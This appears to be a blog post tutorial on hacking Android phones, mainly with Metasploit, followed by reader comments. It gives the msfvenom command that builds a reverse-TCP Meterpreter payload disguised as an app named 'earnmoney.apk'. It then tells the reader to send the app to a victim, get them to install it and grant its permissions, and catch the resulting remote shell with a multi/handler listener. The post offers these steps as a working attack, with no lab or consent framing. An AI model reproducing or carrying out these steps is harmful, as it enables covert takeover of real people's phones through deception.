Hacking android


Hacking Android via AndroRat tool and make port forwarding 
for clear explanation watch my youtube video

hacking android phone




follow the video for the clear explanation and here are the links i have been used







post2:-

 Android Hacking with Metasploit Frame work

In this post you be learning about how to hack a android mobile by sending a link to the victim

firstly start you kali machine








open metasploit framework 







once after opening the metasploit console type the following command 
"here you will be creating the apk to hack the victim phone"
so follow the commands


"msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 R> /var/www/html/earnmoney.apk "

*in place of 0.0.0.0 [enter you system ip address]
*lport anything
*-p is payload 
make sure you execute the command with super user 


 





the screeen will be shown like this .Once after creating go to the location and copy the apk and send it you victim tell thm to install the application 
















send the apk to your target and install it 
after installing give the permission from the target phone :
















Once after giving the permission go to your Hacking machine

Before launching attack, we need to check the status of the apache server. 
Type command:
check it : service apache2 status









once checking 

Type the follow command :
After this open msfconsole:- use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST (system ip)
then set LPORT 4444










then give exploit

done!!!!




Comments

  1. Best place to find study related stuff, and this provides a depth knowledge about computer field..
    Keep helping, keep growing..

    ReplyDelete
    Replies
    1. Just wanted demo video in this website itself.YT just deletes Hacking related videos of Small Creators

      Delete

Post a Comment

Popular posts from this blog

Mobile Application Development Lab

WEB PROGRAMMING LAB (html&php)

Python Programming